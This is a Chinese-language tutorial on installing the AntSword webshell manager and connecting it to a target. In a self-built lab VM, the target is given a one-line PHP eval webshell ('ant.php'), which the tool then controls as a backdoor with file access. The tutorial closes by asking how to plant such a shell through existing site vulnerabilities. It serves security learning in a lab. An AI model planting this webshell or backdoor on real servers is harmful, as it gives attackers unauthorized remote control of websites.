【简单工具】中国蚁剑V2.0下载安装到上手

目录

1 安装及设置

1.1 下载

1. 下载蚁剑加载器。在蚁剑官方github下载，网址为https://github.com/AntSwordProject/AntSword-Loader，根据自己系统下载对应版本。
2. 可以不下载源码，选择工作文件时下载器将自动安装最新源码，如果想利用现有源码，则在选择工作文件时选择已有源码目录。

1.2 安装

1. 本次安装不指定已有源码，让软件直接下载最新版源码，创建一个文件夹，命名为“蚁剑工作目录”。
2. 解压加载器，在该文件夹中找到安装程序，以管理员身份运行加载器。
3. 点击初始化→选择第一步创建的文件夹→确定。
4. 程序将自动下载安装，过程如下：
5. 待安装过程结束后，再次打开加载器程序，则会打开蚁剑工作界面。

1.3 相关设置

在软件界面左上角，根据自己需要可对语言、代理等进行设置。

2 第一个Shell

2.1 实验环境

1. 靶机：win2008虚拟机，部署WAMP环境，IP地址为192.168.1.5。
2. 真实机：win10系统，部署中国蚁剑。

2.2 实验步骤

1. 在靶机上，启动WAMP环境，在网站根目录下新建一个文件并命名为ant.php，写入语句<?php eval($_POST['ant']); ?>，该语句的解释参考文章《PHP语言常见可注入函数》。
2. 在真实机上，打开蚁剑软件，在工作界面空白处单击「鼠标右键」，弹出菜单，选择 「添加数据」。
3. 在添加数据页面输入以下参数，其中星标的是必填项，URL是靶机刚刚添加文件的路径，密码是该文件中语句的密码。填写完毕后点击“添加”。
4. 蚁剑界面上将显示刚刚建立的后门。
5. 双击进入，可以看到管理界面就像本机文件管理器一样。

2.3 思考

本实验中在靶机下的php文件是我们自己建立的，在不自己建立文件的情况下，如何利用网站已有漏洞进行注入？参考文章《PHP注入漏洞利用实验》

3 总结

1. 了解蚁剑的安装过程；
2. 了解蚁剑的功能；
3. 掌握蚁剑的基本使用方法。

参考文献

1. 《蚁剑——语雀笔记》